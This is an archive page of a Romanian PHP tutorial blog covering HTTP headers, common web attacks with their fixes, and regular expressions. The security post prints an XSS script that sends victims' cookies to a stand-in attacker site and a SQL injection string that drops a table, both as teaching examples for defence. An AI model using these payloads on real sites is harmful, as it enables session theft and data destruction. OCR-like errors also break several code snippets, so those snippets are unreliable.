Archive for category Php tutorial
Lucrul cu headere HTTP din PHP
Posted by admin in Php tutorial on February 3, 2010
Asa cum, in sistemul de fisiere, pe langa informatia utila dintr-un fisier sunt stocate si informatii despre acesta (data crearii, a ultimei modificari etc), la fel intr-un mesaj HTTP sunt transmise, pe langa datele efective, informatii de control (ex: informatii despre continutul mesajului, despre client, server etc). Aceste informatii aditionale poarta denumirea de headere HTTP si sunt importante pentru programatorul PHP deoarece prin intermediul lor se realizeaza operatii precum:
- redirectionarea clientului catre o alta adresa (prin intermediul headerului Redirect)
- specificarea tipului de continut pe care serverul il trimite clientului, astfel incat browserul web sa stie cum sa trateze acel continut: sa il afiseze direct (daca este vorba de text simplu), sa il afiseze formatat (daca este sursa HTML), sa il deschida cu ajutorul unui plug-in1 (daca este de tip PDF sau doc) etc. Toate acestea sunt posibile prin intermediul headerului HTTP Content-type
- setarea unui cookie (memorarea unei informatii pe client, in scopul extragerii ei ulterioare) – cu ajutorul headerului Set-Cookie (vezi sectiunea despre cookies in cadrul acestui material)
- specificarea strategiei de caching a browserului pentru pagina ceruta – cu ajutorul headerelor Cache-Control si Expires. Browserele internet incearca in general sa pastreze in cache cat mai multa informatie posibila, astfel incat utilizatorul sa aiba dublul avantaj al vitezei si al consumului mai mic de banda. Uneori insa pastrarea unei copii a unei pagini pe client nu este dezirabila (ex: pentru paginile generate dinamic, al caror continut se poate schimba de la o cerere la alta)
Headerele sunt de forma Nume-Header: informatii. In mesajul HTTP, headerele se afla intotdeauna inaintea! continutului mesajului si sunt separate de acesta printr-o linie goala. De aceea. este important ca, atunci cand o aplicatie genereaza dinamic continut web (inclusiv headere HTTP atasate acestui continut), headerele sa fie generate inaintea oricarui alt output al aplicatiei generatoare.
Lucrul cu headere HTTP din PHP
PHP pune la dispozitia programatorului cateva functii predefinite pentru lucrul cu headere HTTP:
- header() – folosita pentru a trimite headere HTTP specificate de programator catre client
- headers_sent() - folosita pentru a verifica daca headerele au fost deja trimise catre client (caz in care nu mai putem adauga altul)
- headers__listO - returneaza lista de headere destinate clientului (care au fost deja trimise sau care sunt in asteptare)
Functia header are urmatorul prototip:
void header ( string $header [, bool $replace [, int $http_response_code]]
lata semnificatiile argumentelor:
- Sheader - reprezinta headerul HTTP in forma in care acesta apare in mesajul HTTP (exemplu: “Location: http://www.example.com/index.php“)
- Sreplace - indica daca, in caz ca exista deja un header cu acelasi nume, noul header sa il inlocuiasca pe cel vechi sau sa fie adaugat listei de headere ce trebuie trimise clientului.
- $http_response_code - specifica codul de raspuns HTTP care sa fie trimis clientului. Codurile de raspuns HTTP sunt formate din 3 cifre, iar in functie de prima cifra pot avea urmatoarele semnificatii:
- 1xx – coduri de informare a clientului, intermediare o
- 2xx – coduri ce indica succesul unei cereri a clientului o
- 3xx – redirectionari
- 4xx - indica o eroare din partea clientului (ex: 404 – Not Found)
- 5xx – erori ale serverului sau incapacitatea acestuia de a onora cererea clientului (ex: 503 Service Unavailable)
//fortam aparitia ferestrei de save in loc de simpla afisare formatata in browser header (“Content-di sposition: attachment; filename=statistici.html”);
// trimiterea unui fisier .doc prin intermedin”! unui script PHP header(“Content-type: text/html”);
HTTP este un protocol stateless – fiecare cerere este tratata de catre server independent de celelalte, serverul nu isi “aminteste” ce s-a intamplat la cererile anterioare si nu coreleaza in vreun fel mai multe cereri, chiar daca ele provin de la acelasi client sau daca corespund unor resurse aflate in acelasi site.
Solutii pentru memorarea informatiei intre doua cereri
Pentru ca serverul sa poata mentine informatii care tin de un anume client de la o cerere a acestuia la alta, este necesara salvarea datelor in cauza la incheierea unei cereri si incarcarea lor la cererea urmatoare. Memorarea acestor date se poate face:
• pe client. Solutia este mecanismul de cookies – mici cantitati de informatie pe care serverul web le poate stoca pe hard-disk-ul clientului, urmand ca ele sa-i fie trimise inapoi serverului la cererile urmatoare pe care clientul le efectueaza (vezi mai jos sectiunea despre cookies)
• pe server. Solutia este sistemul de management al sesiunilor: serverul aloca clientului un spatiu de stocare pentru informatii proprii (variabile de sesiune), in care acestea se salveaza la incheierea fiecarei cereri si se incarca inapoi la urmatoarea cerere care este detectata a veni de la acelasi client. Mecanismul de stocare este dublat de unul de identificare a clientului, care permite serverului sa recunoasca cereri disparate ca venind de la acelasi client (vezi sectiunea despre sesiuni). Felul in care se face salvarea informatiilor de sesiune este configurabil de catre administratorul serverului web si al modulului de PHP (se poate face in fisiere, baze de date etc.)
[catlist id=18 numberposts=10]
Securitate in PHP
Posted by admin in Php tutorial on February 3, 2010
TIPURI DE ATACURI IN PHP
Atunci cand programatorul nu tine cont de aspectele discutate pana acum in acest material, el creeaza vulnerabilitati in codul sau, care pot fi apoi exploatate de catre crackeri. Vor fi prezentate in continuare cateva dintre cele mai des intalnite tipuri de atacuri impotriva unui site, impreuna cu solutii pentru prevenirea lor.
1.Falsificarea formularelor
Precum s-a spus si anterior, programatorul nu poate sti din ce sursa provin datele de intrare ale scriptului. Sa presupunem ca scriem un script PHP numit detalii.php care afiseaza un formular HTML ce solicita utilizatorului numele (introdus manual) si sexul (sub forma unui drop-down list). Acelasi script realizeaza si prelucrarea datelor:
$form = <<<FORM
<form method=post action=$_SERVER[PHP_SELF]>
<input>
<select>
<option value=M>Masculin</option>
<option value=F>Feminin</option> </select>
<input value=submit> </form>
FORM;
if(!empty($_POST['submit,])){ Snume = $_POST['nume'];
$sex = $_POST['sex']; // valori posibile: M sau F
}
Faptul ca scriptul trimite formularul catre browser si ca tot el receptioneaza si prelucreaza datele nu trebuie sa ne faca sa credem ca datele de intrare ale acestui script provin neaparat de la formularul pe care el il afiseaza! Un utilizator poate scrie oricand un fisier HTML ca urmatorul:
<form method=post action=”http://www.example.com/detalii.php“>
<input nume=sex>
<input value=trimite>
In acest formular, utilizatorul ar putea introduce orice string pentru sexul persoanei, iar numele acesteia lipseste cu desavarsire. La expedierea datelor, tot scriptul detalii.php va fi cel care le primeste (ca si in cazul formularului “oficial”), insa ele nu sunt complete, iar campul sex nu mai are neaparat una dintre cele doua valori posibile.
Inventariind, scriptul detalii.php are cateva probleme:
- se bazeaza pe faptul ca, daca el e cel care afiseaza formularul, datele de intrare vor proveni din acel formular. S-a demonstrat mai sus ca nu este adevarat
- presupune ca poate impune un set discret de valori pentru o valoare de intrare, afisand in formular un drop-down list cu valorile posibile. S-a demonstrat de asemenea ca, atata timp cat input-ul poate proveni dintr-un alt formular, complet diferit, programatorul nu mai poate sti ce fel de componenta a fost folosita pentru editarea valorii (in fond, tot ce receptioneaza scriptul este o pereche nume-valoare)
- presupune ca, daca in $_POST se gaseste elementul corespunzator butonului de submit, atunci in S_POST sunt de asemenea prezente toate datele necesare. S-a aratat mai sus faptul ca datele din input pot fi prezente in orice combinatie, fara nici o legatura cu felul in care a fost gandit formularul “oficial” (cel afisat de catre detalii.php)
Solutie
Avand in vedere ca sursa datelor nu este sub controlul programatorului, acesta poate lua doua seturi de masuri: - sa incerce sa se asigure ca datele provin chiar din formularul afisat de catre scriptul sau, si nu din altul. Solutia este doar partiala, pentru ca destule browsere din ziua de astazi au facilitati ce permit editarea datelor din POST inainte de expedierea unui formular, iar in aceste conditii input-ul ar putea fi invalid chiar daca provine din formularul corect – sa verifice prezenta tuturor datelor necesare in input si sa le valideze inainte de a lucra cu ele – este solutia cea mai sigura, si care trebuie oricum aplicata datelor de intrare indiferent de scenariu
Atentie! O falsa solutie este incercarea de validare a datelor folosind un limbaj de scripting ce ruleaza pe client (ex: Javascript). Sa nu uitam insa ca 1) orice ruleaza pe client nu este de incredere si 2) chiar daca arfi, limbajele de scripting potfi dezactivate din browser, anuland tot beneficiul validarii client-side dintr-un simplu click. Astfel de metode pot fi folosite doar ca mecanisme aditionale de validare, dar programatorul nu trebuie sa se bazeze exclusiv pe ele.
2.Cross-site scripting (XSS)
Atacurile de tip cross-site scripting sunt posibile atunci cand o aplicatie (in cazul nostra, un script PHP) permite injectarea de cod in paginile web generate de catre aceasta. De obicei acest tip de atacuri functioneaza in conjunctie cu limbaje de scripting ce ruleaza pe client (ex: Javascript). Un astfel de atac a fost prezentat in cadrul acestui material, in sectiunea 14.4.2.1: o aplicatie PHP memoreaza sugestiile utilizatorilor intr-o baza de date, afisand ultima sugestie introdusa. Daca programatorul preia ca atare input-ul utilizatorului si il afiseaza inapoi in browser, el deschide calea unui atac de tip XSS, deoarece un atacator poate introduce cod HTML si Javascript care apoi va fi interpretat ca atare de browserele altor utilizatori care vizualizeaza pagina in cauza. Sa ne imaginam ce se va intampla daca atacatorul introduce ca “sugestie” urmatorul string:
<script language= “javascript”>
document. location=‘http://www.site-atacator.com? thecookie= ‘+document.cookie;
</script>
Orice utilizator care vizualizeaza apoi “sugestia” introdusa va fi redirectionat catre site-ul atacatorului, insa continutul eventualului cookie trimis catre site-ul original va fi inclus in query string, putand fi apoi usor extras de catre atacator (ex: $_GET['thecookie']).
Solutie
Problema in acest caz este afisarea neeontrolata in browser a input-ului de la un utilizator rauvoitor. Precum s-a discutat in cadrul acestui material, orice caracter sau constractie cu regim special pentru browser trebuie reprezentat(a) folosind entitatile HTML corespunzatoare, iar acest lucra poate fi facut in PHP folosind functiile htmlspecialchars()/htmlentities(). In acest fel, la afisarea codului de mai sus in browser, el se va vedea exact asa cum apare in exemplu, fara a fi interpretat ca cod HTML/Javascript.
3.SQL injection
Atacurile de tip SQL injection presupun injectarea de cod SQL rauvoitor in interogarile efectuate de un site catre baza de date cu care lucreaza, in scopul distrugerii sau furtului de date sau al accesului neautorizat la informatie. Acest lucra este posibil cand interogarile sunt generate folosind informatii provenite de la utilizator.
Sa consideram exemplul unui script PHP ce primeste username-ul si parola introduse de utilizatori si efectueaza o interogare in baza de date pentru a determina parola corespunzatoare username-ului primit:
$sql = “select * FROM useri where username=’$_POST['user']}’ “;
Un atacator ar putea introduce urmatoarea secventa pe post de username: ‘; DROP TABLE useri–. $sql devine acum:
SELECT * from useri where username ‘ ‘; drop table useri; –’
Atacatorul a reusit astfel sa genereze mai multe comenzi SQL, una dintre ele fiind distructiva. Apostroful de incheiere al valorii username-ului este anulat de delimitatorul de comentariu (– in SQL).
Solutii
Problema in scenariul de mai sus este ca input-ul provenit de la utilizator nu trece printr-o procedura de escaping inainte de a fi trimis catre baza de date. Se disting urmatoarele solutii/recomandari:
- orice string trimis catre baza de date trebuie filtrat prin mysqli_real_escape_string() sau echivalentul acestei functii pentru extensia de baze de date folosita
- un script trebuie sa aiba privilegiile minime necesare asupra bazei de date. In exemplul de mai sus, scriptul nu ar trebui sa aiba permisiunea de DROP pe tabelele bazei de date
4.Session hijacking
Sistemul de sesiuni PHP poate fi inselat; depinde de cat de bine este folosit de catre programator. Spre exemplu, din punct de vedere al sistemului de sesiuni, un utilizator este identificat printr-un numar – session ID-ul, stocat in session cookie sau in URL. Daca un utilizator neautorizat intra in posesia session ID-ului altui user, si creeaza un cookie/URL continand acest session ID, un script PHP nu ar fi constient de faptul ca interactioneaza acum cu un alt utilizator.
Un atacator ar putea ajunge in posesia session id-ului unui utilizator in diferite moduri, unul dintre cele mai intalnite fiind XSS: fie accesand continutul cookie-ului trimis de utilizatorul valid catre server (daca session ID-ul este pastrat in session cookie), fie injectand un link extern caruia i se va adauga session id-ul automat (daca PHP este configurat sa faca acest lucru).
Un alt mod de a intra in posesia diverselor session id-uri ale clientilor este pe un server de shared hosting (care gazduieste mai multe site-uri pe aceeasi statie). Mecanismul default de serializare a datelor de sesiune le salveaza sub forma de fisiere in /tmp, toate procesele serverului web avand acces la aceasta informatie.
Odata ce un atacator reuseste sa “fure” sesiunea unui utilizator in acest fel, el se prezinta practic serverului ca fiind acel utilizator si, daca utilizatorul in cauza era autentificat, va avea acces la datele private ale victimei.
Solutii
Problema in scenariul de mai sus este ca un utilizator este identificat printr-un simplu numar care, odata intrat in posesia atacatorului, ii permite acestuia din urma sa preia identitatea victimei. Posibile remedii sunt:
- efectuarea unor verificari suplimentare, in afara simplului session ID. Una dintre practicile des intalnite este memorarea continutului headerului HTTP User-Agent in datele de sesiune. User-Agent specifica browserul folosit de client, si care se presupune ca ramane constant de-a lungul unei sesiuni. La fiecare cerere efectuata de catre client, se verifica daca User-Agent-ul memorat in sesiune corespunde cu cel primit prin HTTP la cererea curenta
- folosirea unui alt mecanism de salvare a datelor de sesiune pentru scenariile de tip shared hosting. O varianta des folosita este salvarea sesiunilor intr-o baza de date
6.Session fixation
Atacurile de tip session fixation au ca scop fortarea unui anumit session id pentru sesiunea unui utilizator. Daca atacatorul prestabikste session id-ul, il poate folosi mai apoi pentru a fura identitatea victimei si a accesa datele sale private dupa ce aceasta se autentifica.
Sa ne reamintim ca functia session-start() initiaza o sesiune sau restaureaza una veche, dupa caz. Id-ul sesiunii este fie general pe loc, fie este folosit cel prezent in GET, POST sau COOKIE. Numele default al session cookie-ului este PHPSESSID. Un atacator ar putea trimite victimei (pe messenger, prin XSS etc) un link catre site-ul pe care doreste sa castige acces, insa link-ul va contine session id-ul:
http://vww.example. com/index.php ?PHPSESSID=7qw8ynfyutfqt
Cand victima da click pe acest link, site-ul destinatie va porni o sesiune, insa cu session id-ul deja specificat in query string. Dupa ce victima se autentifica, atacatorul poate folosi session id-ul pentru a fura sesiunea victimei.
Solutii
Acest atac functioneaza atunci cand session id-ul poate fi prestabilit de catre atacator, ramanand acelasi dupa autentificarea victimei. Solutia este ca, intotdeauna cand privilegiile unui utilizator se schimba (cum este cazul autentiflcarii in scopul accesarii unei portiuni protejate dintr-un site), session id-ul sa fie regenerat. Aceasta operatie se realizeaza folosind functia session_regenerate_id():
session_start();
if( auth($user, $pass) === true){ session_regenerate_id();
}
REGULAR EXPRESSIONS (REGEX)
Posted by admin in Php tutorial on January 2, 2010
Regular expressions sunt expresii care ne permit sa specificam formatul unui sir de caractere. Scenariile in care apare nevoia de regex-uri sunt in general doua:
- cand dorim sa cautam si sa extragem siruri de caractere cu format cunoscut dintr-un text mai mare. Exemplu: intentionam sa obtinem doar adresele de e-mail dintr-un fisier text care contine diverse informatii despre o lista de utilizatori.
- cand dorim sa validam date (sa ne asiguram ca anumite informatii au format corect). Exemplu: datele introduse de catre utilizator intr-un formular HTML trebuie sa respecte anumite cerinte – datele calendaristice sa fie formatate intr-un anume fel, numele de persoane sa contina nume si prenume separate prin spatiu sau -, etc.
Exista deosebiri fundamental intre cautarea obisnuita si cea folosind regex-uri:
- in cautarea obisnuita, cunoastem de la bun inceput sirul de caractere ce va fi gasit, iar ceea ce ne intereseaza sunt informatii suplimentare (pozitia sau pozitiile aparitiei lui, frecventa de aparitie etc)
- in cautarea cu regex-uri, nu stim dinainte sirurile de caractere pe care le vom gasi, ci vom obtine toate sirurile corespunzatoare formatului specificat. Asadar scopul cautarii, spre deosebire de cautarea obisnuita, poate fi chiar lista de siruri al caror format este precizat in regex
Un regex este format dintr-o succesiune de caractere (litere, cifre, semne de punctuatie), insa cu urmatoarele particularitati:
• intreaga expresie este cuprinsa intre doua caractere delimitatoare. Caracterul delimitator de inceput este acelasi cu eel
de sfarsit si este ales de catre programator. Acest caracter nu are voie sa fie alfanumeric sau \.
/regex/ – modalitatea traditional a de delimitare a unui
#regex# – modalitate alternativa de delimitare
\regex\ – modalitate invalida
Nota: daca in interiorul regex-ului estefolosit caracterul delimitator, el trebuie precedat de un \.
constructia cu paranteze drepte [ ] – tine locul unui singur caracter. Ne permite sa specificam un set discret de caractere ce se pot afla pe o anumita pozitie din sir. Intre paranteze, caracterul ^ (accent circumflex) are rol de negare. Exemple:
| Regex | Siruri ce corespund | Comentarii, explicatii |
| [flp]in | fin, lin, pin | constructia [flp] corespunde unui singur caracter, si anume unuia dintre cele specificate in interiorul parantezelor |
| [r-t]ara | rara, sara,tara | constructia [r-t] corespunde unui singur caracter, mai exact unuia dintre cele aflate intre r si t (r,s,t) |
| [br-tv] | bara, rara, sara, tara, vara | pot fi combinate primele doua modalitati. Indiferent de cate caractere se afla inauntrul parantezelor, constructia tine loc de un singur caracter (in acest caz, acela poate fi b,r,s,t sau v) |
| [A-Z][a-z] | orice cuvant de doua litere care incepe cu litera mare | constructia [] poate fi folosita de oricate ori este nevoie in cadrul unui regex |
| [A-Z][^a-z] | orice sir de doua litere care incepe cu litera mare si are pe pozitia a doua orice altceva decat litera mica (ex: C#, A4 etc) | [^a-z] corespunde unui singur caracter, care nu poate fi litera mica. Atentie! Negarea unei litere sau a unui set de litere inseamna ca pe pozitia respectiva se pot gasi cifre, semne de punctuatie etc |
• punctul – tine locul unui singur caracter. Indica faptul ca pe respectiva pozitie din sir se poate gasi orice caracter (insa unui singur!) cu exceptia newline (\n). Daca este activata optiunea DOT-ALL (vezi mai jos modificatori), punctul corespunde si caracterelor newline.
| Regex | Siruri ce corespund | Comentarii, explicatii |
| .in | fin, lin, pin dar si #in, %in etc | . inseamna orice caracter, inclusiv semne de punctuatie, cifre etc |
| [r-t]a.a | rara, sara, tara dar si rata, raba, tata, ta(a, sa@a etc | punctul poate fi combinat cu una dintre celelalte constructii |
| [A-Z]. | o litera mare urmata de orice caracter (ex: Am, Nu, F&, H* etc) |
Nota: pentru a specifica chiar caracterul punct pe una dintre poziliile sirului cautat, este necesara precedarea lui cu
• clase de caractere uzuale, predefinite. lata cateva exemple:
o \d — digit (cifra zecimala)
o \D — non-digit (un caracter care nu este cifra zecimala)
o \s – whitespace. Corespunde caracterelor spatiu, tab (\t) si newline (\n)
o \S – non-whitespace
o \w – word character (litera, cifra sau underscore)
o \W – non-word character
| Regex | Siruri ce corespund | Comentarii, explicatii |
| \d-\d | unscor la fotbal: 3-2, 1-0 etc | constructia [flp] corespunde unui singur caracter, si anume unuia dintre cele specificate in interiorul parantezelor |
| B\s\d\d\s[A-Z][A-Z][A-Z] | un numar de automobil de Bucuresti (ex: B 13 RTG) | caracterul B, spatiu, doua cifre, spatiu, 3 litere mari. De remarcat insa ca \s corespunde si cu TAB sau NEWLINE, asadar aceasta expresie nu ar selecta numai numere de masina, ci si succesiuni de 3 linii care contin B pe linia 1, doua cifre pe linia 2 si 3 litere pe linia 3 |
Putem specifica repetitia controlata a unui caracter sau a unei intregi subexpresii folosind doua constructii:
• constructia cu acolade:
caracter{min,max} – caracterul se repeta intre min si max ori
(regex){min,max} – intreaga expresie se repeta intre min si max ori
Sunt permise varialiuni ale acestei sintaxe:
(regex){n} - repetitie de exact n ori
(regex){min,} - repetitie de minim n ori, fara limita superioara a numarului de repetitii
Observatie: atunci cand dorim sa punem conditia de repetare a unei parti a regexului ce contine mai multe caractere, acea subexpresie trebuie inclusa intre paranteze rotunde.
Exemple:
| Regex | Siruri ce corespund | Comentarii, explicatii |
| 07\d{8} | un numar de mobil (ex: 0720123456) | caracterele 0 si 7 urmate de 8 cifre |
| [A-Z]{2}\d{6} | serie si numar de buletin (ex: VF735245) | o litera mare care se repeta de exact 2 ori, urmata de o cifra care se repeta de exact 6 ori |
| [A-Z][a-z]{0,1} | un element chimic (ex: H, Na etc) | o litera mare, urmata de o litera mica ce apare o data sau deloc |
| [A-Z]{1,2}\s\d{2}\s[A-Z]{3} | un numar de automobil (ex: B 35 EDX sau MM 67 WSL) | una sau doua litere mari, un spatiu, doua cifre, un spatiu si apoi trei litere mari |
| [A-Z][a-z]{1,} | un cuvant care incepe cu litera mare (ex: Marius) |
metacaractere folosite pentru cazuri de repetitii particulare
(regex)+ – echivalent cu (regex){1,} (minim o repetitie a lui regex)
(regex)* - echivalent cu (regex){0,} (0 sau mai multe repetitii ale lui regex)
(regex)? – echivalent cu (regex){0,1} (regex apare o data sau deloc)
Exemple:
| Regex | Siruri ce corespund | Comentarii, explicatii |
| [A-Z][a-z\s]+\. | o propozitie (ex: Am un mar.) | o litera mare urmata de una sau mai multe litere mici sau spatii si terminandu-se cu un punct |
| [a-z]+\.[a-z]+@[a-z]\.[a-z]{2-4} | o adresa de mail de forma victor.manu@gmail.com | o litera mica care se repeta minim o data, un caracter. (observati \-ul), o litera mica care se repeta cel putin o data, caracterul @, din nou o succesiune de litere mici (eel putin una) apoi punct si numele domeniului radacina (com, net, org, info, tv etc) |
• caracterul^ – daca apare la inceputul regex-ului, pune conditia ca sirul de caractere gasit sa se afle la inceputul textul ui in care se face cautarea
• caracterul $ – daca apare la sfarsitul regex-ului, impune ca sirul de caractere ce corespunde regex-ului sa se afle la finalul textului in care se face cautarea
Observatie: atunci cand ^ apare in interiorul parantezelor drepte (la specificarea unci clase de caractere), el are alta semnificatie: cea de negare.
Daca in regex se activeaza optiunea MULTILINE (vezi mai jos modificatori), atunci ^ va corespunde fiecarui inceput de linie, iar $ fiecarui sfarsit de linie, daca textul in care se face cautarea este unul de mai multe linii. Optiunea MULTILINE este initial dezactivata, conditii in care ^ corespunde inceputului intregului text iar $ sfarsitului aceluiasi text.
Exemplu: cautand sirurile de caractere ce corespund regex-ului ninge$ pe textul urmator:
Ziua ninge
noaptea ninge
dimineata ninge iara
vor fi gasite urmatoarele siruri, in functie de caz:
daca optiunea MULTILINE este activata, va fi gasit sirul ninge de doua ori – la finalul primei linii si al celei de-a doua. Cuvantul ninge de pe linia 3 nu este gasit deoarece nu se afla la sfarsit de linie
daca optiunea MULTILINE este dezactivata, nu va fi gasit nici un sir, deoarece $ corespunde finalului intregului text, iar textul nu se termina cu sirul ninge .
Modificatori de optiuni
Regex-ul poate contine si elemente care nu desemneaza caractere, clase de caractere sau repetitii, ci specifica optiuni aplicate motorului de regular expressions in cazul expresiei respective. Modificatorii se pot specifica cu urmatoarea constructie in interiorul unui regex:
(?optiuni) – activarea uneia sau mai multor optiuni
(?-optiuni) – dezactivarea uneia sau mai multor optiuni
(?optiuni1-optiuni2) – activarea optiunilor din grupul 1 si dezactivarea celor din grupul 2
Iata cateva optiuni uzuale:
• CASELESS (i) – in aplicarea regex-ului in cauza nu se va mai face distinctie intre literele mici si mari
• DOT-ALL (s) – punctul va corespunde oricarui caracter, inclusiv newline
• MULTILINE (m) – caracterele ^ si $ nu vor mai corespunde doar inceputului si sfarsitului intregului text in care se cauta, ci fiecarui inceput si sfarsit de linie componenta
Exemple:
| Regex | Siruri ce corespund | Comentarii, explicatii |
| (?i)php | php, PHP | optiune utila atunci cand cautam o anumita succesiune de litere, indiferent daca sunt mici sau mari; fara aceasta optiune am fi fost fortati sa scriem [Pp][Hh][Pp] |
| (?im)php$ | php sau PHP aflate la sfarsit de linie | pot fi activate sau dezactivate mai multe optiuni simultan |
| ab(?i)cd(?-i)ef | abedef, abCDef, abCdef, abcDef | optiunile pot fi activate numai pe o portiune a regex-ului (in cazul nostru, CASELESS este activ numai pentru literele c si d) |
In cadrul unui regex, caracterul special | permite specificarea unor formate alternative pentru sirul de caractere cautat/validat sau pentru o portiune a sa:
regexl | regex2 caracterul are rol de sau
Exemple:
| Regex | Siruri ce corespund | Comentarii, explicatii |
| Mari(e|oara) | Marie, Marioara | finalul sirului cautat are doua formate posibile |
| (021|07\d)\d{7} | un numar de Bucuresti (fix) sau de mobil | 021 urmat de 7 cifre, sau 07 urmat de 8 cifre |
| ([fs]|vs|)printf | suita de functii printf din PHP (printf, fprintf, sprintf, vsprintf) | sirul incepe cu f, cu s, cu vs sau cu nimic (remarcati caracterul | de dinante de paranteza rotunda inchisa) urmat de printf’. |
| (f|v?s|)printf | inaintea lui printf se poate afla: nimic, caracterul f, sau caracterul s precedat sau nu de un v |
Sub-expresii
Sub-expresiile reprezinta portiuni ale unui regex delimitate prin paranteze rotunde si care pot fi extrase separat sau referite chiar din cadrul regex-ului. Ele sunt utile in doua cazuri:
- cand cautam un sir de caractere corespunzator unui regex insa ne intereseaza numai o parte a sa, care nu putea fi cautata independent (un subsir). Exemplu: dorim sa extragem toate link-urile dintr-un fisier HTML; pentru aceasta cautam toate sirurile de fonna <a href=….>…</a> si extragem din ele numai valoarea atributului href
- cand dorim ca, din cadrul unui regex, sa ne referim la o portiune anterioara a sa (“back references”). Exemple: a) un regex! incepe cu un caracter (ales de catre programator, asadar necunoscut) dar se termina cu acelasi caracter. b) un tag HTML, care are delimitatori de deschidere si de inchidere, ultimul putand fi specificat prin referire la primul
Subexpresiile primesc automat numere incepand de la 1, in ordinea in care apar in regex, pentru a oferi posibilitatea referirii lor din cadrul regex-ului si a extragerii sirurilor de caractere ce le corespund. Daca se doreste referirca unei subexpresii din cadrul regex-ului, se pot folosi secventele \1, \2 …\99 ce semnifica sirul de caractere ce a corespuns primei subexpresii, celei de-a doua subexpresii etc
Exemplu: aplicandu-se regex-ul ^([A-ZJ+) cel ([a-z]+)$ pentru sirurile de caractere din prima coloana a tabelului de mai jos, continuturile subexpresiilor sunt cele din coloanele 2 si 3:
| Subexpresia 1([A-Z\s]+) | Subexpresia 2 ([a-z]+) | |
| “Andrii Popa cel voinic” | Andrii Popa | voinic |
| “Stefan cel mare” | Stefan | mare |
| “Mircea cel batran” | Mircea | batran |
| Exemplu: <(?i)([A-Z]+)>[^<]*</ \1> |
| sirul incepe cu <, se activeaza optiunea CASELESS, continua cu una sau |
| (marl sau mici constituie prima subexpresie, Urmeaza >, apoi 0 sau |
| diferite de <, si tagul de inchidere, format, din </ si apoi sirul ce a |
| subexpresii |
Exista cazuri in care dorim sa includem o portiune a regex-ului intre paranteze, insa fara ca ea sa fie automat considerata (si numerotata) ca sub-expresie (ex: (021 |07\d)\d{7}, unde parantezele sunt folosite numai pentru specificarea formatului alternativ al inceputului de sir). In astfel de cazuri putem folosi secventa (?: ) pentru a incadra portiunea de regex dorita; intre ? si : pot fi specificate si optiuni
Functii PHP predefinite pentru lucrul cu regex-uri
Iata principalele functii PHP predefinite pentru lucrul cu PCRE:
• int preg_match ( string $regex, string $string [, array &$matches [, int $flags [, int $offset]]]) – cauta in $string prima aparitie a unui sir ce corespunde formatului specificat in $regex. Returneaza 1 in caz de gasire si 0 in caz contrar. Daca este folosit si al treilea argument, acesta se populeaza astfel: $matches[0] contine intregul sir ce a corespuns regex-ului, $matches[l] sirul corespunzator primei subexpresii etc. Al patrulea argument, daca exista, ofera posibilitatea de a impune pozitia din $string de la care sa inceapa cautarea.
$s = “mere pere in panere” ;
echo preg_match(‘/ere/’, $s);
$a = array() ;
preg_match(‘/(.)ere\s(.)/’,$s, $a);
var_dump($a);
array(2) {
[0]=>strings(4) “mere p”
[1]=>string(1) “m”
[2]=> string(1) “p”
}
int preg_match_all ( string $regex, string $string, array &$matches [, int $flags [, int $offset]]) – functioneaza la fel ca preg_match, insa al treilea argument este obligatoriu, el fiind populat cu toate sirurile gasite care corespund pattern-ului (preg_match se oprea la prima aparitie). Felul in care este populat acest tablou este dat de parametrul $flags, care ofera urmatoarele posibilitati:
• PREG_PATTERN_ORDER – elementele din $matches corespund subexpresiilor din $regex. $matches[0] va avea ca valoare un tablou cu toate sirurile intregi care au corespuns regex-ului, $matches[l] va avea ca valoare un tablou ce contine toate sirurile ce au corespuns primei subexpresii etc.
• PREGSETORDER – fiecare element din $matches corespunde unei aparitii de subsir ce corespunde regex-ului, si are ca valoare un tablou cu toate sirurile corespunzatoare subexpresiilor. Smatches[0][0] contine
- mixed preg_replace ( mixed $regex, mixed $inlocuitor, mixed $string [, int $limit [, int &$count]]) – returneaza o copie a lui $string in care subsirurile ce corespund formatului din $regex sunt inlocuite cu $inlocuitor. Al patrulea argument, daca este prezent, specifica numarul maxim de inlocuiri, iar in ultimul argument se memoreaza numarul de inlocuiri efectuate.
- array preg_split ( string $pattern, string $subject [, int $limit [, int $flags]]) – alternativa la strtok() sau explode(), cu diferenta ca delimitatorul de campuri (sirul de caractere declarat ca separator) este acum specificat sub forma uni regex
[catlist id=18 numberposts=10]

